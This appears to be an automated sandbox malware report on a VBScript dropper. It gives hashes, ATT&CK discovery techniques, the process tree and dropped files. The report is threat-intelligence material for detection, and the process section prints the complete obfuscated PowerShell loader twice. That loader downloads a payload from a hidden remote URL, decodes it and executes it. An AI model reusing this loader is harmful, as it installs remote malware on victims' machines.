0324a1256fbd39beb2be9e5080f4ae43fb38c921f10b1f425e4ea6c499c19d41

General

Target

0324a1256fbd39beb2be9e5080f4ae43fb38c921f10b1f425e4ea6c499c19d41.vbs
Size

13KB
MD5

ad56c3f3ce8f6dca80b316067593e043
SHA1

12f6b1219e73b84f0fc1e0c27f056ac8b597e561
SHA256

0324a1256fbd39beb2be9e5080f4ae43fb38c921f10b1f425e4ea6c499c19d41
SHA512

5e0420f48d4d5cf1ed208b43908abe6068f231dd16e4c2920fc7ec03f0d49f1c6ae97a2564df435fee4ef564adaac1fca5790585ab389165694ea67ec73be104
SSDEEP

192:IFt1G5TbO/OFPducb5dh+CxWBWFzyVGvDFJagA6a/AldmHOpmyb3YzesvWKnvnnx:Is5TQOFPp5OEWBWFbagASdc+T3tsFvnx

Score

8^/10

discovery

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
11	1004	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	WScript.exe

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
1004	powershell.exe
2352	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1004	powershell.exe
1004	powershell.exe
2352	powershell.exe
2352	powershell.exe
2352	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1004	powershell.exe
Token: SeDebugPrivilege	2352	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 3720 wrote to memory of 1004	3720	WScript.exe	84
PID 3720 wrote to memory of 1004	3720	WScript.exe	84

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0324a1256fbd39beb2be9e5080f4ae43fb38c921f10b1f425e4ea6c499c19d41.vbs"
1⤵
- Checks computer location settings
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:3720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Dramaturgiens='Kapur';;$Romancealist='Lokalkolorit';;$Enkindler='Ingenerative';;$Kickas='Vandskadens';;$Kuperer=$host.Name;function Whiff($Rdsomme){If ($Kuperer) {$Gocart=3} for ($Havnepladsen226=$Gocart;;$Havnepladsen226+=4){if(!$Rdsomme[$Havnepladsen226]){cls;break }$computerberegninger+=$Rdsomme[$Havnepladsen226];$sorbol='sufferableness'}$computerberegninger}function Preembody($Beguilements){ .($Bimpels) ($Beguilements)}$Bruseniches=Whiff ' W n OuesmatRec.Kr,w';$Bruseniches+=Whiff 'Li,ED,lbi tC LoLfjoIRygEH tNKo t';$samstillingen=Whiff '.icMTeloBr.zM ciP,rlsiklB sa B /';$Bundprops=Whiff '.reTKvalAf,sF.r1Ru 2';$Ultrafastidious='How[ grnLo.ECustHe..Tops.steKu RudsvEn,IUddc.oreForPUndoshaistun,uatOrtmsveAsynn ekABlogAu,eMonrMid]Reh:All:L.psJuvE,eccFelUPreR IrIskrtsemY rpPrvR afo .oTVero rcstroRepl,es=The$sacb ouLa N Pod PrPErhRTroOLimpHers';$samstillingen+=Whiff 'Hit5 ch.R c0Dep Eks(surW ,niBorn phdRo oUdlwNicsum MuNAlkTska sph1 .l0ste.A.p0Po ;Aut oWDoli lan sh6Fol4.ve;Org VesxDe,6 K.4 tz; me anrMaavUfo:Bru1Cad3Rge1alt.Mer0Mar)sol epGJosePencRedk JeoTri/ No2B.d0Pos1 Tr0unc0 in1Lau0Kal1dek PoFRekiTrorGenebr.fNikoFilxDu,/ In1 ed3Res1ska..il0';$Majors=Whiff 'FusuO esRa,esver fr-T lAI yGAn.e annRadT';$Branchicolous=Whiff 'EnthInct s tFlapHklsHau:Be / Ba/UnihH lsRec2Quiv k.Grai UncCoeuInt/spifKapBMaenvagz onyForJ loIEncq Pe/immTWarrGolvPe,lTeje .lk Krrs roEftnBoneLovrsgnsBed.Phemsymsscoi';$unbelligerent=Whiff 'Dis>';$Bimpels=Whiff 'BarI,epe lax';$Dkstj='sygehusudvalg';$Whitefishes='\Lochioschesis.Ros';Preembody (Whiff 'B.g$VapGF.rLBesoObsBt.tAO,elstv:fjosIgacFooh PeROmgaEnvTAli6Udt6Ba.=Con$HyoEPopNT mvMea:DebaAndpHempPa DTylA Opt rmAZec+ uk$R,swAppHTuciOu T,asEschF inistosRenHMareP.rs');Preembody (Whiff 's i$MyrGst.LAlcoTreB DrAD glBe : acmteka D RExuM poP ur,ijeProRKi.Espe=Thr$Embb her feANekNAbac MahMilIsupcKrfoFisLRa.OsupUNons Th.PresVarPArbl unIUdltsol(Reg$DatUCy,nadrB seEKenLLaulDiaiFejg s.eBerRsk,EGr NRadT Un)');Preembody (Whiff $Ultrafastidious);$Branchicolous=$Marmorere[0];$Unappliableness=(Whiff 'Okk$heaG sjlrado seB Rea RulAna: Bis FoK ExUCo mEscMBi eDo N PrdTimeXylss.c= R nLa eKolWMyc-A,tOA.ubI aj riE VecCirTCal Gos .aYwaks P tCheEsmrmMel.su,$jamb kRInsuKons foE Gen efIPerCExtHWage Pas');Preembody ($Unappliableness);Preembody (Whiff 'Aft$Gr sserkHy u omAfsmPoseO,sn G dVree nds Vi.FisH,dvesi.a Pod bae perT ussa [ Or$UnsMsm,aV,tjKa oBatr A sstr]Fat=ste$ sqsCraa ulm yrsVibtPuli,ivl D lGtei HynGe gm ne spn');$Fangnes=Whiff 'Nat$Fors,dmkPriuFalmFelm aceTvinMardP.eeDa sVot.C rDAmoo suwRegnBetlOpho PsaU rd dFpreiTynlGgleDop(Fla$ B BE.sr AfaafvnCalcKonhBaji LocGerohallE roN.iu,ors I ,Gar$Oecs agrsirtUnsrI,tyDoikPr kIaceBesnchae ops.yn)';$srtrykkenes=$schrat66;Preembody (Whiff ' H $lenGC.il A,o .oB LeAFeelTr :Intu s nsolF too MeNsteDM cLsole dtDmou=Bes(s,etFanePrissomtBra-YoupAffAEtftH lHL t sl.$synsNebREmdTA gr omysymKM.dKP eeF dnsomEspasChl)');while (!$unfondled) {Preembody (Whiff 'Til$T eg .elPasoUnbbVena Trluov:ArbE axFaccUdsi K tkonaAdsnMe tsut=Bo $balPPaia NulUn.a tatBleaB gbD.oi MilAppi fhtLavy') ;Preembody $Fangnes;Preembody (Whiff ' LosCenT,jlaEg,rRetT Mi-BedsLasl.raE,poegaup Ma sa4');Preembody (Whiff 'L,t$ A,GPallM nORekB Caa Melst,:BilU maNVaaFUraoHelN,andBellE ee.asDCla=Ice(RidT R eskosMertK.n-help seA saTVr.H .m Th$Airs UnRFortDekr.omyAktkLa kOmseCr n lEBessP n)') ;Preembody (Whiff ' U,$AttGFalLFeiO MibEthaElelvio:BlkRO,eeD,pG saePril MaLLa sjar= or$Gymg,anLGeoOPldB AnAKrylTr : aEKnoRCamy ros Pri ep KlhanaARu cFreEAtoAT,leCon+Rea+Bor%Fo $HisMJenaEr RH.vm okoIndR smE.elRBr.E Ma.O fc ako MeUcennFlst') ;$Branchicolous=$Marmorere[$Regells]}$Husenes=283781;$Ugepressen202=27959;Preembody (Whiff ' A,$spegR dls,ioKonb kyaL el K :Fa J alaIndCHeaqzigUAgtaD,mrY,rd PeVVitv.xuE hot.ne byp= br DanGsk.e NuTCod- OrcA oolooNTarT F.E otN,hatC i Rot$BlosKatRLetTHydRNebYVanKDiaKstaeCliN reAars');Preembody (Whiff 'Non$Li g .il aoIn,bAc.aNonlBr.:FinM Aua OvsCerkTeki udn Grf gaeLigj til fdeJeen.mes Bl Lu=R t Moo[UansactyDjvs RatD se L mKry. soCRelo Oln .avRa eMulr UmtBun] Bi:Ros:CanFMetrNoroV nmTenBom aTarsBouesur6spo4 Prs utsamrFejiMednProgper( ec$C nJ iasamcM dqF.guPlaa snrHuldOblv sav aeUnit s )');Preembody (Whiff ' Te$Acog orLJa.OResB,kaa ,plAka:TursEnecTilHFlueWilR stzBaioAn eUncNsnisAl Afr=For Cat[ DesKonYKors FotF,rEUpaM em.,utt beENeuXBelTPo . .iE P NLibcImpOErgd iri ,pnH zGApp]Fer:Car:hibAPaas erCPari UnIPou. seG,inEBygta isParTdiaRspoiPinn Udg Fo(app$UnsM Moa HisRosK Tri Frn eF A E upJAnalLugE tnZonsTer)');Preembody (Whiff 'Reg$smagAntLEgeoM sb raaApeL ce: orsE sA,unN.ordan,KJa.a ,bGA vesok= s.$J ws rc .ah s eLavRRocz HoOR.teBusno esH,g.Anas ulusu,B sus rntU.dR FoiDannCorgstr(Con$sopHKunu sys BrEEntN .iE otsGar, Rt$,ndU UdgspueB iPstiRR eEeles sasgl.EIchNE.a2Con0 s 2 a)');Preembody $sandkage;"
  2⤵
  - Blocklisted process makes network request
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1004

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Dramaturgiens='Kapur';;$Romancealist='Lokalkolorit';;$Enkindler='Ingenerative';;$Kickas='Vandskadens';;$Kuperer=$host.Name;function Whiff($Rdsomme){If ($Kuperer) {$Gocart=3} for ($Havnepladsen226=$Gocart;;$Havnepladsen226+=4){if(!$Rdsomme[$Havnepladsen226]){cls;break }$computerberegninger+=$Rdsomme[$Havnepladsen226];$sorbol='sufferableness'}$computerberegninger}function Preembody($Beguilements){ .($Bimpels) ($Beguilements)}$Bruseniches=Whiff ' W n OuesmatRec.Kr,w';$Bruseniches+=Whiff 'Li,ED,lbi tC LoLfjoIRygEH tNKo t';$samstillingen=Whiff '.icMTeloBr.zM ciP,rlsiklB sa B /';$Bundprops=Whiff '.reTKvalAf,sF.r1Ru 2';$Ultrafastidious='How[ grnLo.ECustHe..Tops.steKu RudsvEn,IUddc.oreForPUndoshaistun,uatOrtmsveAsynn ekABlogAu,eMonrMid]Reh:All:L.psJuvE,eccFelUPreR IrIskrtsemY rpPrvR afo .oTVero rcstroRepl,es=The$sacb ouLa N Pod PrPErhRTroOLimpHers';$samstillingen+=Whiff 'Hit5 ch.R c0Dep Eks(surW ,niBorn phdRo oUdlwNicsum MuNAlkTska sph1 .l0ste.A.p0Po ;Aut oWDoli lan sh6Fol4.ve;Org VesxDe,6 K.4 tz; me anrMaavUfo:Bru1Cad3Rge1alt.Mer0Mar)sol epGJosePencRedk JeoTri/ No2B.d0Pos1 Tr0unc0 in1Lau0Kal1dek PoFRekiTrorGenebr.fNikoFilxDu,/ In1 ed3Res1ska..il0';$Majors=Whiff 'FusuO esRa,esver fr-T lAI yGAn.e annRadT';$Branchicolous=Whiff 'EnthInct s tFlapHklsHau:Be / Ba/UnihH lsRec2Quiv k.Grai UncCoeuInt/spifKapBMaenvagz onyForJ loIEncq Pe/immTWarrGolvPe,lTeje .lk Krrs roEftnBoneLovrsgnsBed.Phemsymsscoi';$unbelligerent=Whiff 'Dis>';$Bimpels=Whiff 'BarI,epe lax';$Dkstj='sygehusudvalg';$Whitefishes='\Lochioschesis.Ros';Preembody (Whiff 'B.g$VapGF.rLBesoObsBt.tAO,elstv:fjosIgacFooh PeROmgaEnvTAli6Udt6Ba.=Con$HyoEPopNT mvMea:DebaAndpHempPa DTylA Opt rmAZec+ uk$R,swAppHTuciOu T,asEschF inistosRenHMareP.rs');Preembody (Whiff 's i$MyrGst.LAlcoTreB DrAD glBe : acmteka D RExuM poP ur,ijeProRKi.Espe=Thr$Embb her feANekNAbac MahMilIsupcKrfoFisLRa.OsupUNons Th.PresVarPArbl unIUdltsol(Reg$DatUCy,nadrB seEKenLLaulDiaiFejg s.eBerRsk,EGr NRadT Un)');Preembody (Whiff $Ultrafastidious);$Branchicolous=$Marmorere[0];$Unappliableness=(Whiff 'Okk$heaG sjlrado seB Rea RulAna: Bis FoK ExUCo mEscMBi eDo N PrdTimeXylss.c= R nLa eKolWMyc-A,tOA.ubI aj riE VecCirTCal Gos .aYwaks P tCheEsmrmMel.su,$jamb kRInsuKons foE Gen efIPerCExtHWage Pas');Preembody ($Unappliableness);Preembody (Whiff 'Aft$Gr sserkHy u omAfsmPoseO,sn G dVree nds Vi.FisH,dvesi.a Pod bae perT ussa [ Or$UnsMsm,aV,tjKa oBatr A sstr]Fat=ste$ sqsCraa ulm yrsVibtPuli,ivl D lGtei HynGe gm ne spn');$Fangnes=Whiff 'Nat$Fors,dmkPriuFalmFelm aceTvinMardP.eeDa sVot.C rDAmoo suwRegnBetlOpho PsaU rd dFpreiTynlGgleDop(Fla$ B BE.sr AfaafvnCalcKonhBaji LocGerohallE roN.iu,ors I ,Gar$Oecs agrsirtUnsrI,tyDoikPr kIaceBesnchae ops.yn)';$srtrykkenes=$schrat66;Preembody (Whiff ' H $lenGC.il A,o .oB LeAFeelTr :Intu s nsolF too MeNsteDM cLsole dtDmou=Bes(s,etFanePrissomtBra-YoupAffAEtftH lHL t sl.$synsNebREmdTA gr omysymKM.dKP eeF dnsomEspasChl)');while (!$unfondled) {Preembody (Whiff 'Til$T eg .elPasoUnbbVena Trluov:ArbE axFaccUdsi K tkonaAdsnMe tsut=Bo $balPPaia NulUn.a tatBleaB gbD.oi MilAppi fhtLavy') ;Preembody $Fangnes;Preembody (Whiff ' LosCenT,jlaEg,rRetT Mi-BedsLasl.raE,poegaup Ma sa4');Preembody (Whiff 'L,t$ A,GPallM nORekB Caa Melst,:BilU maNVaaFUraoHelN,andBellE ee.asDCla=Ice(RidT R eskosMertK.n-help seA saTVr.H .m Th$Airs UnRFortDekr.omyAktkLa kOmseCr n lEBessP n)') ;Preembody (Whiff ' U,$AttGFalLFeiO MibEthaElelvio:BlkRO,eeD,pG saePril MaLLa sjar= or$Gymg,anLGeoOPldB AnAKrylTr : aEKnoRCamy ros Pri ep KlhanaARu cFreEAtoAT,leCon+Rea+Bor%Fo $HisMJenaEr RH.vm okoIndR smE.elRBr.E Ma.O fc ako MeUcennFlst') ;$Branchicolous=$Marmorere[$Regells]}$Husenes=283781;$Ugepressen202=27959;Preembody (Whiff ' A,$spegR dls,ioKonb kyaL el K :Fa J alaIndCHeaqzigUAgtaD,mrY,rd PeVVitv.xuE hot.ne byp= br DanGsk.e NuTCod- OrcA oolooNTarT F.E otN,hatC i Rot$BlosKatRLetTHydRNebYVanKDiaKstaeCliN reAars');Preembody (Whiff 'Non$Li g .il aoIn,bAc.aNonlBr.:FinM Aua OvsCerkTeki udn Grf gaeLigj til fdeJeen.mes Bl Lu=R t Moo[UansactyDjvs RatD se L mKry. soCRelo Oln .avRa eMulr UmtBun] Bi:Ros:CanFMetrNoroV nmTenBom aTarsBouesur6spo4 Prs utsamrFejiMednProgper( ec$C nJ iasamcM dqF.guPlaa snrHuldOblv sav aeUnit s )');Preembody (Whiff ' Te$Acog orLJa.OResB,kaa ,plAka:TursEnecTilHFlueWilR stzBaioAn eUncNsnisAl Afr=For Cat[ DesKonYKors FotF,rEUpaM em.,utt beENeuXBelTPo . .iE P NLibcImpOErgd iri ,pnH zGApp]Fer:Car:hibAPaas erCPari UnIPou. seG,inEBygta isParTdiaRspoiPinn Udg Fo(app$UnsM Moa HisRosK Tri Frn eF A E upJAnalLugE tnZonsTer)');Preembody (Whiff 'Reg$smagAntLEgeoM sb raaApeL ce: orsE sA,unN.ordan,KJa.a ,bGA vesok= s.$J ws rc .ah s eLavRRocz HoOR.teBusno esH,g.Anas ulusu,B sus rntU.dR FoiDannCorgstr(Con$sopHKunu sys BrEEntN .iE otsGar, Rt$,ndU UdgspueB iPstiRR eEeles sasgl.EIchNE.a2Con0 s 2 a)');Preembody $sandkage;"
1⤵
- Network Service Discovery
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2352

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Discovery

1

T1046

Peripheral Device Discovery

Query Registry

System Information Discovery

3

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
71444def27770d9071039d005d0323b7

SHA1
cef8654e95495786ac9347494f4417819373427e

SHA256
8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

SHA512
a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fga0m4ye.y0d.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Lochioschesis.Ros

Filesize
405KB

MD5
75256cb02edc22122cd7160ad5cd8384

SHA1
49819cf37b51113de6c659aae8f3d88235c77859

SHA256
ff1e2b584c0bf9961fa6f4584618b1819fd6a34a17070a9d9d8db3063395bfb7

SHA512
9639ca948d25186cabd6ee73e1df178b60c74e546e82a087c5b2947bacf6222410994e3427cf7744f897ff10c42353b6847917629d658ef388ca6a333e512461

Download Submit
memory/1004-0-0x00007FFCBCE13000-0x00007FFCBCE15000-memory.dmp

Filesize
8KB

Download
memory/1004-10-0x0000027858860000-0x0000027858882000-memory.dmp

Filesize
136KB

Download
memory/1004-11-0x00007FFCBCE10000-0x00007FFCBD8D1000-memory.dmp

Filesize
10.8MB

Download
memory/1004-12-0x00007FFCBCE10000-0x00007FFCBD8D1000-memory.dmp

Filesize
10.8MB

Download
memory/1004-14-0x00007FFCBCE10000-0x00007FFCBD8D1000-memory.dmp

Filesize
10.8MB

Download
memory/1004-16-0x00007FFCBCE13000-0x00007FFCBCE15000-memory.dmp

Filesize
8KB

Download
memory/1004-17-0x00007FFCBCE10000-0x00007FFCBD8D1000-memory.dmp

Filesize
10.8MB

Download
memory/1004-18-0x00007FFCBCE10000-0x00007FFCBD8D1000-memory.dmp

Filesize
10.8MB

Download
memory/1004-21-0x00007FFCBCE10000-0x00007FFCBD8D1000-memory.dmp

Filesize
10.8MB

Download
memory/2352-24-0x0000000004BD0000-0x0000000004BF2000-memory.dmp

Filesize
136KB

Download
memory/2352-25-0x00000000052E0000-0x0000000005346000-memory.dmp

Filesize
408KB

Download
memory/2352-26-0x0000000005350000-0x00000000053B6000-memory.dmp

Filesize
408KB

Download
memory/2352-36-0x0000000005480000-0x00000000057D4000-memory.dmp

Filesize
3.3MB

Download
memory/2352-23-0x0000000004C40000-0x0000000005268000-memory.dmp

Filesize
6.2MB

Download
memory/2352-38-0x0000000005A90000-0x0000000005AAE000-memory.dmp

Filesize
120KB

Download
memory/2352-39-0x0000000005AC0000-0x0000000005B0C000-memory.dmp

Filesize
304KB

Download
memory/2352-40-0x0000000007450000-0x0000000007ACA000-memory.dmp

Filesize
6.5MB

Download
memory/2352-41-0x0000000006050000-0x000000000606A000-memory.dmp

Filesize
104KB

Download
memory/2352-43-0x0000000006AC0000-0x0000000006AE2000-memory.dmp

Filesize
136KB

Download
memory/2352-42-0x0000000006DD0000-0x0000000006E66000-memory.dmp

Filesize
600KB

Download
memory/2352-44-0x0000000007AD0000-0x0000000008074000-memory.dmp

Filesize
5.6MB

Download
memory/2352-22-0x0000000002180000-0x00000000021B6000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads